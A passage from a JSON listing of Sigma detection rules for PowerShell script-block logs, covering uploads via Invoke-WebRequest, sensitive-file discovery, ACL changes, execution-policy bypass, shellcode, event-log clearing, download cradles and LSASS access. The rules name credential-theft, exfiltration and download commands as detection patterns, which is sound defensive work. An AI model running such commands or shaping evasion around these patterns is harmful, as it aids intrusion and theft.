    "content": "title: PowerShell Script With File Upload Capabilities\nid: d2e3f2f6-7e09-4bf2-bc5d-90186809e7fb\nstatus: test\ndescription: Detects PowerShell scripts leveraging the \"Invoke-WebRequest\" cmdlet to send data via either \"PUT\" or \"POST\" method.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1020/T1020.md\n    - https://www.w3.org/Protocols/rfc2616/rfc2616-sec9.html\n    - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-webrequest?view=powershell-7.4\nauthor: frack113\ndate: 2022-01-07\nmodified: 2025-07-18\ntags:\n    - attack.exfiltration\n    - attack.t1020\nlogsource:\n    product: windows\n    category: ps_script\n    definition: bade5735-5ab0-4aa7-a642-a11be0e40872\ndetection:\n    selection_cmdlet:\n        ScriptBlockText|contains:\n            - 'Invoke-RestMethod'\n            - 'Invoke-WebRequest'\n            - 'irm '\n            - 'iwr '\n    selection_flag:\n        ScriptBlockText|contains:\n            - '-Method \"POST\"'\n            - '-Method \"PUT\"'\n            - '-Method POST'\n            - '-Method PUT'\n            - \"-Method 'POST'\"\n            - \"-Method 'PUT'\"\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_sensitive_file_discovery.yml",
    "content": "title: Powershell Sensitive File Discovery\nid: 7d416556-6502-45b2-9bad-9d2f05f38997\nrelated:\n    - id: d23f2ba5-9da0-4463-8908-8ee47f614bb9\n      type: derived\nstatus: test\ndescription: Detect adversaries enumerate sensitive files\nreferences:\n    - https://twitter.com/malmoeb/status/1570814999370801158\nauthor: frack113\ndate: 2022-09-16\ntags:\n    - attack.discovery\n    - attack.t1083\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_action:\n        ScriptBlockText|contains:\n            - ls\n            - get-childitem\n            - gci\n    selection_recurse:\n        ScriptBlockText|contains: '-recurse'\n    selection_file:\n        ScriptBlockText|contains:\n            - '.pass'\n            - '.kdbx'\n            - '.kdb'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_set_acl.yml",
    "content": "title: PowerShell Script Change Permission Via Set-Acl - PsScript\nid: cae80281-ef23-44c5-873b-fd48d2666f49\nrelated:\n    - id: 0944e002-e3f6-4eb5-bf69-3a3067b53d73 # ProcCreation Susp\n      type: derived\n    - id: bdeb2cff-af74-4094-8426-724dc937f20a # ProcCreation Low\n      type: derived\n    - id: 3bf1d859-3a7e-44cb-8809-a99e066d3478 # PsScript High\n      type: derived\nstatus: test\ndescription: Detects PowerShell scripts set ACL to of a file or a folder\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1505.005/T1505.005.md\nauthor: frack113, Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-07-18\ntags:\n    - attack.defense-evasion\n    - attack.t1222\nlogsource:\n    product: windows\n    category: ps_script\n    definition: bade5735-5ab0-4aa7-a642-a11be0e40872\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - 'Set-Acl '\n            - '-AclObject '\n            - '-Path '\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_set_acl_susp_location.yml",
    "content": "title: PowerShell Set-Acl On Windows Folder - PsScript\nid: 3bf1d859-3a7e-44cb-8809-a99e066d3478\nrelated:\n    - id: cae80281-ef23-44c5-873b-fd48d2666f49 # PsScript Low\n      type: derived\n    - id: 0944e002-e3f6-4eb5-bf69-3a3067b53d73 # ProcCreation Susp\n      type: derived\n    - id: bdeb2cff-af74-4094-8426-724dc937f20a # ProcCreation Low\n      type: derived\nstatus: test\ndescription: Detects PowerShell scripts to set the ACL to a file in the Windows folder\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1505.005/T1505.005.md\n    - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-acl?view=powershell-5.1\nauthor: frack113, Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-07-18\ntags:\n    - attack.defense-evasion\n    - attack.t1222\nlogsource:\n    product: windows\n    category: ps_script\n    definition: bade5735-5ab0-4aa7-a642-a11be0e40872\ndetection:\n    selection_cmdlet:\n        ScriptBlockText|contains|all:\n            - 'Set-Acl '\n            - '-AclObject '\n    selection_paths:\n        # Note: Add more suspicious paths\n        ScriptBlockText|contains:\n            - '-Path \"C:\\Windows'\n            - '-Path \"C:/Windows'\n            - \"-Path 'C:\\\\Windows\"\n            - \"-Path 'C:/Windows\"\n            - '-Path C:\\\\Windows'\n            - '-Path C:/Windows'\n            - '-Path $env:windir'\n            - '-Path \"$env:windir'\n            - \"-Path '$env:windir\"\n    selection_permissions:\n        # Note: Add more suspicious permissions\n        ScriptBlockText|contains:\n            - 'FullControl'\n            - 'Allow'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_set_policies_to_unsecure_level.yml",
    "content": "title: Change PowerShell Policies to an Insecure Level - PowerShell\nid: 61d0475c-173f-4844-86f7-f3eebae1c66b\nrelated:\n    - id: cf2e938e-9a3e-4fe8-a347-411642b28a9f # ProcCreation Registry\n      type: similar\n    - id: 87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180 # ProcCreation Cmdlet\n      type: similar\n    - id: fad91067-08c5-4d1a-8d8c-d96a21b37814 # Registry\n      type: similar\nstatus: test\ndescription: Detects changing the PowerShell script execution policy to a potentially insecure level using the \"Set-ExecutionPolicy\" cmdlet.\nreferences:\n    - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.4\n    - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.4\n    - https://adsecurity.org/?p=2604\nauthor: frack113\ndate: 2021-10-20\nmodified: 2023-12-14\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_cmdlet:\n        ScriptBlockText|contains: 'Set-ExecutionPolicy'\n    selection_option:\n        ScriptBlockText|contains:\n            - 'Unrestricted'\n            - 'bypass'\n    filter_optional_chocolatey:\n        ScriptBlockText|contains:\n            - \"(New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1')\"\n            - \"(New-Object System.Net.WebClient).DownloadString('https://chocolatey.org/install.ps1')\"\n    condition: all of selection_* and not 1 of filter_optional_*\nfalsepositives:\n    - Administrator script\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_shellcode_b64.yml",
    "content": "title: PowerShell ShellCode\nid: 16b37b70-6fcf-4814-a092-c36bd3aafcbd\nstatus: test\ndescription: Detects Base64 encoded Shellcode\nreferences:\n    - https://twitter.com/cyb3rops/status/1063072865992523776\nauthor: David Ledbetter (shellcode), Florian Roth (Nextron Systems)\ndate: 2018-11-17\nmodified: 2024-01-25\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1055\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains:\n            - 'OiCAAAAYInlM'\n            - 'OiJAAAAYInlM'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_shellintel_malicious_commandlets.yml",
    "content": "title: Malicious ShellIntel PowerShell Commandlets\nid: 402e1e1d-ad59-47b6-bf80-1ee44985b3a7\nstatus: test\ndescription: Detects Commandlet names from ShellIntel exploitation scripts.\nreferences:\n    - https://github.com/Shellntel/scripts/\nauthor: Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)\ndate: 2021-08-09\nmodified: 2023-01-02\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains:\n            - 'Invoke-SMBAutoBrute'\n            - 'Invoke-GPOLinks'\n            # - 'Out-Minidump' # Covered in 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6\n            - 'Invoke-Potato'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_software_discovery.yml",
    "content": "title: Detected Windows Software Discovery - PowerShell\nid: 2650dd1a-eb2a-412d-ac36-83f06c4f2282\nstatus: test\ndescription: Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518/T1518.md\n    - https://github.com/harleyQu1nn/AggressorScripts # AVQuery.cna\nauthor: Nikita Nazarov, oscd.community\ndate: 2020-10-16\nmodified: 2022-12-02\ntags:\n    - attack.discovery\n    - attack.t1518\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            # Example: Get-ItemProperty HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -Autosize\n            - 'get-itemProperty'\n            - '\\software\\'\n            - 'select-object'\n            - 'format-table'\n    condition: selection\nfalsepositives:\n    - Legitimate administration activities\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_store_file_in_alternate_data_stream.yml",
    "content": "title: Powershell Store File In Alternate Data Stream\nid: a699b30e-d010-46c8-bbd1-ee2e26765fe9\nstatus: test\ndescription: Storing files in Alternate Data Stream (ADS) similar to Astaroth malware.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md\nauthor: frack113\ndate: 2021-09-02\nmodified: 2022-12-25\ntags:\n    - attack.defense-evasion\n    - attack.t1564.004\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_compspec:\n        ScriptBlockText|contains|all:\n            - 'Start-Process'\n            - '-FilePath \"$env:comspec\" '\n            - '-ArgumentList '\n            - '>'\n    condition: selection_compspec\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_ace_tampering.yml",
    "content": "title: Potential Persistence Via Security Descriptors - ScriptBlock\nid: 2f77047c-e6e9-4c11-b088-a3de399524cd\nstatus: test\ndescription: Detects usage of certain functions and keywords that are used to manipulate security descriptors in order to potentially set a backdoor. As seen used in the DAMP project.\nreferences:\n    - https://github.com/HarmJ0y/DAMP\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-05\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - 'win32_Trustee'\n            - 'win32_Ace'\n            - '.AccessMask'\n            - '.AceType'\n            - '.SetSecurityDescriptor'\n        ScriptBlockText|contains:\n            - '\\Lsa\\JD'\n            - '\\Lsa\\Skew1'\n            - '\\Lsa\\Data'\n            - '\\Lsa\\GBG'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_ad_group_reco.yml",
    "content": "title: AD Groups Or Users Enumeration Using PowerShell - ScriptBlock\nid: 88f0884b-331d-403d-a3a1-b668cf035603\nstatus: test\ndescription: |\n    Adversaries may attempt to find domain-level groups and permission settings.\n    The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group.\n    Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md\nauthor: frack113\ndate: 2021-12-15\nmodified: 2022-12-25\ntags:\n    - attack.discovery\n    - attack.t1069.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    test_2:\n        ScriptBlockText|contains: get-ADPrincipalGroupMembership\n    test_7:\n        ScriptBlockText|contains|all:\n            - get-aduser\n            - '-f '\n            - '-pr '\n            - DoesNotRequirePreAuth\n    condition: 1 of test_*\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_alias_obfscuation.yml",
    "content": "title: Potential PowerShell Obfuscation Using Character Join\nid: e8314f79-564d-4f79-bc13-fbc0bf2660d8\nrelated:\n    - id: 96cd126d-f970-49c4-848a-da3a09f55c55\n      type: derived\nstatus: test\ndescription: Detects specific techniques often seen used inside of PowerShell scripts to obfscuate Alias creation\nreferences:\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-09\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1027\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        # Example:\n        #   Set-Alias -Name Y -Value (-join(\"Ne\",\"w-O\",\"bje\",\"ct\"))\n        #   Set-Alias -Name X -Value (-join(\"Inv\",\"oke\",\"-\",\"Exp\",\"ression\"))\n        ScriptBlockText|contains|all:\n            - '-Alias' # For both \"New-Alias\" and \"Set-Alias\"\n            - ' -Value (-join('\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_clear_eventlog.yml",
    "content": "title: Suspicious Eventlog Clear\nid: 0f017df3-8f5a-414f-ad6b-24aff1128278\nrelated:\n    - id: cc36992a-4671-4f21-a91d-6c2b72a2edf5\n      type: derived\nstatus: test\ndescription: Detects usage of known powershell cmdlets such as \"Clear-EventLog\" to clear the Windows event logs\nreferences:\n    - https://twitter.com/oroneequalsone/status/1568432028361830402\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md\n    - https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html\n    - https://stackoverflow.com/questions/66011412/how-to-clear-a-event-log-in-powershell-7\n    - https://learn.microsoft.com/en-us/dotnet/api/system.diagnostics.eventing.reader.eventlogsession.clearlog?view=windowsdesktop-9.0&viewFallbackFrom=dotnet-plat-ext-5.0#System_Diagnostics_Eventing_Reader_EventLogSession_ClearLog_System_String_\n    - https://learn.microsoft.com/en-us/dotnet/api/system.diagnostics.eventlog.clear\nauthor: Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2022-09-12\nmodified: 2025-10-06\ntags:\n    - attack.defense-evasion\n    - attack.t1070.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        - ScriptBlockText|contains:\n              - 'Clear-EventLog '\n              - 'Remove-EventLog '\n              - 'Limit-EventLog '\n              - 'Clear-WinEvent '\n        - ScriptBlockText|contains|all:\n              - 'Eventing.Reader.EventLogSession' # [System.Diagnostics.Eventing.Reader.EventLogSession]::GlobalSession.ClearLog($_.LogName)\n              - 'ClearLog'\n        - ScriptBlockText|contains|all:\n              - 'Diagnostics.EventLog'\n              - 'Clear'\n    condition: selection\nfalsepositives:\n    - Rare need to clear logs before doing something. Sometimes used by installers or cleaner scripts. The script should be investigated to determine if it's legitimate\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_directory_enum.yml",
    "content": "title: Powershell Directory Enumeration\nid: 162e69a7-7981-4344-84a9-0f1c9a217a52\nstatus: test\ndescription: Detects technique used by MAZE ransomware to enumerate directories using Powershell\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md\n    - https://www.mandiant.com/resources/tactics-techniques-procedures-associated-with-maze-ransomware-incidents\nauthor: frack113\ndate: 2022-03-17\ntags:\n    - attack.discovery\n    - attack.t1083\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - foreach\n            - Get-ChildItem\n            - '-Path '\n            - '-ErrorAction '\n            - SilentlyContinue\n            - 'Out-File '\n            - '-append'\n    condition: selection\nfalsepositives:\n    - Legitimate PowerShell scripts\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_download.yml",
    "content": "title: Suspicious PowerShell Download - Powershell Script\nid: 403c2cc0-7f6b-4925-9423-bfa573bed7eb\nrelated:\n    - id: 65531a81-a694-4e31-ae04-f8ba5bc33759\n      type: derived\nstatus: test\ndescription: Detects suspicious PowerShell download command\nreferences:\n    - https://learn.microsoft.com/en-us/dotnet/api/system.net.webclient.downloadstring?view=net-8.0\n    - https://learn.microsoft.com/en-us/dotnet/api/system.net.webclient.downloadfile?view=net-8.0\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-03-05\nmodified: 2022-12-02\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    webclient:\n        ScriptBlockText|contains: 'System.Net.WebClient'\n    download:\n        ScriptBlockText|contains:\n            - '.DownloadFile('\n            - '.DownloadFileAsync('\n            - '.DownloadString('\n            - '.DownloadStringAsync('\n    condition: webclient and download\nfalsepositives:\n    - PowerShell scripts that download content from the Internet\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_execute_batch_script.yml",
    "content": "title: Powershell Execute Batch Script\nid: b5522a23-82da-44e5-9c8b-e10ed8955f88\nstatus: test\ndescription: |\n    Adversaries may abuse the Windows command shell for execution.\n    The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems.\n    The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands.\n    Batch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops.\n    Common uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple system\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.003/T1059.003.md#atomic-test-1---create-and-execute-batch-script\nauthor: frack113\ndate: 2022-01-02\ntags:\n    - attack.execution\n    - attack.t1059.003\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_start:\n        ScriptBlockText|contains: Start-Process\n    selection_batch:\n        ScriptBlockText|contains:\n            - '.cmd'\n            - '.bat'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate administration script\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_extracting.yml",
    "content": "title: Extracting Information with PowerShell\nid: bd5971a7-626d-46ab-8176-ed643f694f68\nstatus: test\ndescription: |\n    Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials.\n    These can be files created by users to store their own credentials, shared credential stores for a group of individuals,\n    configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md\nauthor: frack113\ndate: 2021-12-19\nmodified: 2022-12-25\ntags:\n    - attack.credential-access\n    - attack.t1552.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - ls\n            - ' -R'\n            - 'select-string '\n            - '-Pattern '\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_follina_execution.yml",
    "content": "title: Troubleshooting Pack Cmdlet Execution\nid: 03409c93-a7c7-49ba-9a4c-a00badf2a153\nstatus: test\ndescription: Detects execution of \"TroubleshootingPack\" cmdlets to leverage CVE-2022-30190 or action similar to \"msdt\" lolbin (as described in LOLBAS)\nreferences:\n    - https://twitter.com/nas_bench/status/1537919885031772161\n    - https://lolbas-project.github.io/lolbas/Binaries/Msdt/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-06-21\ntags:\n    - attack.defense-evasion\n    - attack.t1202\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - 'Invoke-TroubleshootingPack'\n            - 'C:\\Windows\\Diagnostics\\System\\PCW'\n            - '-AnswerFile'\n            - '-Unattended'\n    condition: selection\nfalsepositives:\n    - Legitimate usage of \"TroubleshootingPack\" cmdlet for troubleshooting purposes\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_get_addefaultdomainpasswordpolicy.yml",
    "content": "title: Password Policy Discovery With Get-AdDefaultDomainPasswordPolicy\nid: bbb9495b-58fc-4016-b9df-9a3a1b67ca82\nstatus: test\ndescription: Detetcts PowerShell activity in which Get-Addefaultdomainpasswordpolicy is used to get the default password policy for an Active Directory domain.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1201/T1201.md#atomic-test-9---enumerate-active-directory-password-policy-with-get-addefaultdomainpasswordpolicy\n    - https://learn.microsoft.com/en-us/powershell/module/activedirectory/get-addefaultdomainpasswordpolicy?view=windowsserver2022-ps\nauthor: frack113\ndate: 2022-03-17\ntags:\n    - attack.discovery\n    - attack.t1201\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains: Get-AdDefaultDomainPasswordPolicy\n    condition: selection\nfalsepositives:\n    - Legitimate PowerShell scripts\nlevel: low\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_get_current_user.yml",
    "content": "title: Suspicious PowerShell Get Current User\nid: 4096a49c-7de4-4da0-a230-c66ccd56ea5a\nstatus: test\ndescription: Detects the use of PowerShell to identify the current logged user.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md#atomic-test-4---user-discovery-with-env-vars-powershell-script\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md#atomic-test-5---getcurrent-user-with-powershell-script\nauthor: frack113\ndate: 2022-04-04\ntags:\n    - attack.discovery\n    - attack.t1033\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains:\n            - '[System.Environment]::UserName'\n            - '$env:UserName'\n            - '[System.Security.Principal.WindowsIdentity]::GetCurrent()'\n    condition: selection\nfalsepositives:\n    - Legitimate PowerShell scripts\nlevel: low\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_get_gpo.yml",
    "content": "title: Suspicious GPO Discovery With Get-GPO\nid: eb2fd349-ec67-4caa-9143-d79c7fb34441\nstatus: test\ndescription: Detect use of Get-GPO to get one GPO or all the GPOs in a domain.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1615/T1615.md\n    - https://learn.microsoft.com/en-us/powershell/module/grouppolicy/get-gpo?view=windowsserver2022-ps\nauthor: frack113\ndate: 2022-06-04\ntags:\n    - attack.discovery\n    - attack.t1615\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains: Get-GPO\n    condition: selection\nfalsepositives:\n    - Legitimate PowerShell scripts\nlevel: low\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_get_process.yml",
    "content": "title: Suspicious Process Discovery With Get-Process\nid: af4c87ce-bdda-4215-b998-15220772e993\nstatus: test\ndescription: Get the processes that are running on the local computer.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1057/T1057.md#atomic-test-3---process-discovery---get-process\n    - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-process?view=powershell-7.4\nauthor: frack113\ndate: 2022-03-17\ntags:\n    - attack.discovery\n    - attack.t1057\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains: Get-Process\n    condition: selection\nfalsepositives:\n    - Legitimate PowerShell scripts\nlevel: low\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_getprocess_lsass.yml",
    "content": "title: PowerShell Get-Process LSASS in ScriptBlock\nid: 84c174ab-d3ef-481f-9c86-a50d0b8e3edb\nstatus: test\ndescription: Detects a Get-Process command on lsass process, which is in almost all cases a sign of malicious activity\nreferences:\n    - https://web.archive.org/web/20220205033028/https://twitter.com/PythonResponder/status/1385064506049630211\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-04-23\nmodified: 2022-12-25\ntags:\n    - attack.credential-access\n    - attack.t1003.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains: 'Get-Process lsass'\n    condition: selection\nfalsepositives:\n    - Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_gettypefromclsid.yml",
    "content": "title: Suspicious GetTypeFromCLSID ShellExecute\nid: 8bc063d5-3a3a-4f01-a140-bc15e55e8437\nstatus: test\ndescription: Detects suspicious Powershell code that execute COM Objects\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.015/T1546.015.md#atomic-test-2---powershell-execute-com-object\nauthor: frack113\ndate: 2022-04-02\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1546.015\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - '::GetTypeFromCLSID('\n            - '.ShellExecute('\n    condition: selection\nfalsepositives:\n    - Legitimate PowerShell scripts\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_hyper_v_condlet.yml",
    "content": "title: Suspicious Hyper-V Cmdlets\nid: 42d36aa1-3240-4db0-8257-e0118dcdd9cd\nstatus: test\ndescription: Adversaries may carry out malicious operations using a virtual instance to avoid detection\nreferences:\n    - https://learn.microsoft.com/en-us/virtualization/hyper-v-on-windows/quick-start/enable-hyper-v\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.006/T1564.006.md#atomic-test-3---create-and-start-hyper-v-virtual-machine\nauthor: frack113\ndate: 2022-04-09\ntags:\n    - attack.defense-evasion\n    - attack.t1564.006\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains:\n            - New-VM\n            - Set-VMFirmware\n            - Start-VM\n    condition: selection\nfalsepositives:\n    - Legitimate PowerShell scripts\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_invocation_generic.yml",
    "content": "title: Suspicious PowerShell Invocations - Generic\nid: ed965133-513f-41d9-a441-e38076a0798f\nrelated:\n    - id: 3d304fda-78aa-43ed-975c-d740798a49c1\n      type: derived\n    - id: bbb80e91-5746-4fbe-8898-122e2cafdbf4\n      type: similar\nstatus: test\ndescription: Detects suspicious PowerShell invocation command parameters\nreferences:\n    - Internal Research\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-03-12\nmodified: 2023-01-03\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_encoded:\n        ScriptBlockText|contains:\n            - ' -enc '\n            - ' -EncodedCommand '\n            - ' -ec '\n    selection_hidden:\n        ScriptBlockText|contains:\n            - ' -w hidden '\n            - ' -window hidden '\n            - ' -windowstyle hidden '\n            - ' -w 1 '\n    selection_noninteractive:\n        ScriptBlockText|contains:\n            - ' -noni '\n            - ' -noninteractive '\n    condition: all of selection*\nfalsepositives:\n    - Very special / sneaky PowerShell scripts\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_susp_invocation_specific.yml",
